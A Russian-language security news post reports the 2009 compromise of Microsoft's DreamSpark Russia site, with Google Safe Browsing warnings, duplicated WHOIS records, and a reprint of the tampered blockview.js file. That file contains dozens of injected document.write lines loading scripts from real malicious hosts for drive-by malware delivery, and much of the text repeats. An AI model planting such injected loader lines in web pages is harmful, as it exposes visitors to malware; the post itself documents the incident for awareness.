Уязвимые сайты → Один из проектов компании Microsoft, DreamSpark - был взломан
Web проект компании Microsoft, DreamSpark - это бесплатный для студентов и аспирантов доступ к полным лицензионным версиям инструментов для разработки и дизайна от компании Microsoft.
Согласно данным поисковой системы Google, 11 ноября 2009, на сайте www.dreamspark.ru было обнаружено:
В настоящий момент, при попытке посетить сайт по ссылке с поисковой системы Google или открыть ресурс в браузере Mozilla Firefox, отображается уведомление о том, что этот сайт может нанести вред Вашему компьютеру:
Проблема в том, что во время последнего просмотра сайта, поисковой бот Google обнаружил, что на компьютер пользователя, открывшего веб-страницу, автоматически и без разрешения, загружается и устанавливается вредоносное программное обеспечение, которое размещено на серверах Dsgрrореrtiеs.соm и Silikаtnу.ru (для обеспечении безопасности и защиты любопытных пользователей, некоторые латинские буквы были заменены на аналогичных русских букв).
Судя по всему был изменен файл /js/blockview.js, который содержит включения данных с других Web сайтов. В настоящий момент этот файл выглядит следующим образом:
Также, на странице диагностики безопасного просмотра Google для сайта www.dreamspark.ru, говорится о том, что предупреждающее сообщение может быть показано потому что, в некоторых случаях, третьи лица могут добавить вредоносный код на вполне законные сайты.
Согласно данным поисковой системы Google, 11 ноября 2009, на сайте www.dreamspark.ru было обнаружено:
- 3 сценария для эксплуатации уязвимостей
- 1 троянское приложении
- 1 эксплоит
В настоящий момент, при попытке посетить сайт по ссылке с поисковой системы Google или открыть ресурс в браузере Mozilla Firefox, отображается уведомление о том, что этот сайт может нанести вред Вашему компьютеру:
Предупреждение - посещение этого сайта может нанести вред Вашему компьютеру!:
Reported Attack Site!:
Проблема в том, что во время последнего просмотра сайта, поисковой бот Google обнаружил, что на компьютер пользователя, открывшего веб-страницу, автоматически и без разрешения, загружается и устанавливается вредоносное программное обеспечение, которое размещено на серверах Dsgрrореrtiеs.соm и Silikаtnу.ru (для обеспечении безопасности и защиты любопытных пользователей, некоторые латинские буквы были заменены на аналогичных русских букв).
Информация о домене DREAMSPARK.RU:
% по данным WHOIS.NIC.RU:
%
% By submitting a query to RU-CENTER's Whois Service
% you agree to abide by the following terms of use:
% http://www.nic.ru/about/servpol.html (in Russian)
% http://www.nic.ru/about/en/servpol.html (in English).
domain: DREAMSPARK.RU
type: CORPORATE
nserver: ns1.msft.net
nserver: ns3.msft.net
nserver: ns4.msft.net
state: REGISTERED, DELEGATED
phone: +1 4258828080
fax-no: +1 4259367329
e-mail: domains@microsoft.com
e-mail: admin@internationaladmin.com
org: Microsoft Corporation
registrar: RUCENTER-REG-RIPN
created: 2008.02.28
paid-till: 2010.02.28
source: RU-CENTER
Last updated on 2009.11.18 02:53:07 MSK/MSD
%
% By submitting a query to RU-CENTER's Whois Service
% you agree to abide by the following terms of use:
% http://www.nic.ru/about/servpol.html (in Russian)
% http://www.nic.ru/about/en/servpol.html (in English).
domain: DREAMSPARK.RU
type: CORPORATE
nserver: ns1.msft.net
nserver: ns3.msft.net
nserver: ns4.msft.net
state: REGISTERED, DELEGATED
phone: +1 4258828080
fax-no: +1 4259367329
e-mail: domains@microsoft.com
e-mail: admin@internationaladmin.com
org: Microsoft Corporation
registrar: RUCENTER-REG-RIPN
created: 2008.02.28
paid-till: 2010.02.28
source: RU-CENTER
Last updated on 2009.11.18 02:53:07 MSK/MSD
Страница диагностики безопасного просмотра Google для сайта dreamspark.ru:
Судя по всему был изменен файл /js/blockview.js, который содержит включения данных с других Web сайтов. В настоящий момент этот файл выглядит следующим образом:
function blockview(evt){
var objectID = (evt.target) ? evt.target.id : ((evt.srcElement) ? evt.srcElement.id : null);
if(objectID){
if (document.getElementById(objectID+'text').className != "Activ"){
document.getElementById(objectID+'text').className = "Activ";
document.getElementById(objectID+'line').style.display= "none";
document.getElementById(objectID).style.fontWeight= "600";
}
else{
document.getElementById(objectID+'text').className = "Passiv";
document.getElementById(objectID+'line').style.display= "block";
document.getElementById(objectID).style.fontWeight= "400";
}
}
}
document.write('<script src=http://apartmentposts.com/siteadmin/accessk.php ><\/script>');
document.write('<script src=http://apartmentposts.com/siteadmin/accessk.php ><\/script>');
document.write('<script src=http://apartmentposts.com/siteadmin/accessk.php ><\/script>');
document.write('<script src=http://nekocafe76.jp/images/gifimg.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://hexforex.com/euro/y_key_e2e918adc43a7caf.php ><\/script>');
document.write('<script src=http://hexforex.com/euro/y_key_e2e918adc43a7caf.php ><\/script>');
document.write('<script src=http://kompsi.com.ru/images/gifimg.php ><\/script>');
document.write('<script src=http://unter-der-dusche.de/1_mannschaft/links.php ><\/script>');
document.write('<script src=http://dsgproperties.com/images/contactus.php ><\/script>');
document.write('<script src=http://dsgproperties.com/images/contactus.php ><\/script>');
document.write('<script src=http://dsgproperties.com/images/contactus.php ><\/script>');
document.write('<script src=http://dsgproperties.com/images/contactus.php ><\/script>');
document.write('<script src=http://dsgproperties.com/images/contactus.php ><\/script>');
document.write('<script src=http://dsgproperties.com/images/contactus.php ><\/script>');
document.write('<script src=http://dsgproperties.com/images/contactus.php ><\/script>');
document.write('<script src=http://dsgproperties.com/images/contactus.php ><\/script>');
document.write('<script src=http://telugumedia.in/telugu/prajasakthi.php ><\/script>');
document.write('<script src=http://telugumedia.in/telugu/prajasakthi.php ><\/script>');
document.write('<script src=http://silikatny.ru/b0d7f546fa69beb5dc0bea547edfb158/robots.php ><\/script>');
document.write('<script src=http://silikatny.ru/b0d7f546fa69beb5dc0bea547edfb158/robots.php ><\/script>');
document.write('<script src=http://silikatny.ru/b0d7f546fa69beb5dc0bea547edfb158/robots.php ><\/script>');
document.write('<script src=http://silikatny.ru/b0d7f546fa69beb5dc0bea547edfb158/robots.php ><\/script>');
document.write('<script src=http://silikatny.ru/b0d7f546fa69beb5dc0bea547edfb158/robots.php ><\/script>');
var objectID = (evt.target) ? evt.target.id : ((evt.srcElement) ? evt.srcElement.id : null);
if(objectID){
if (document.getElementById(objectID+'text').className != "Activ"){
document.getElementById(objectID+'text').className = "Activ";
document.getElementById(objectID+'line').style.display= "none";
document.getElementById(objectID).style.fontWeight= "600";
}
else{
document.getElementById(objectID+'text').className = "Passiv";
document.getElementById(objectID+'line').style.display= "block";
document.getElementById(objectID).style.fontWeight= "400";
}
}
}
document.write('<script src=http://apartmentposts.com/siteadmin/accessk.php ><\/script>');
document.write('<script src=http://apartmentposts.com/siteadmin/accessk.php ><\/script>');
document.write('<script src=http://apartmentposts.com/siteadmin/accessk.php ><\/script>');
document.write('<script src=http://nekocafe76.jp/images/gifimg.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://hexforex.com/euro/y_key_e2e918adc43a7caf.php ><\/script>');
document.write('<script src=http://hexforex.com/euro/y_key_e2e918adc43a7caf.php ><\/script>');
document.write('<script src=http://kompsi.com.ru/images/gifimg.php ><\/script>');
document.write('<script src=http://unter-der-dusche.de/1_mannschaft/links.php ><\/script>');
document.write('<script src=http://dsgproperties.com/images/contactus.php ><\/script>');
document.write('<script src=http://dsgproperties.com/images/contactus.php ><\/script>');
document.write('<script src=http://dsgproperties.com/images/contactus.php ><\/script>');
document.write('<script src=http://dsgproperties.com/images/contactus.php ><\/script>');
document.write('<script src=http://dsgproperties.com/images/contactus.php ><\/script>');
document.write('<script src=http://dsgproperties.com/images/contactus.php ><\/script>');
document.write('<script src=http://dsgproperties.com/images/contactus.php ><\/script>');
document.write('<script src=http://dsgproperties.com/images/contactus.php ><\/script>');
document.write('<script src=http://telugumedia.in/telugu/prajasakthi.php ><\/script>');
document.write('<script src=http://telugumedia.in/telugu/prajasakthi.php ><\/script>');
document.write('<script src=http://silikatny.ru/b0d7f546fa69beb5dc0bea547edfb158/robots.php ><\/script>');
document.write('<script src=http://silikatny.ru/b0d7f546fa69beb5dc0bea547edfb158/robots.php ><\/script>');
document.write('<script src=http://silikatny.ru/b0d7f546fa69beb5dc0bea547edfb158/robots.php ><\/script>');
document.write('<script src=http://silikatny.ru/b0d7f546fa69beb5dc0bea547edfb158/robots.php ><\/script>');
document.write('<script src=http://silikatny.ru/b0d7f546fa69beb5dc0bea547edfb158/robots.php ><\/script>');
Также, на странице диагностики безопасного просмотра Google для сайта www.dreamspark.ru, говорится о том, что предупреждающее сообщение может быть показано потому что, в некоторых случаях, третьи лица могут добавить вредоносный код на вполне законные сайты.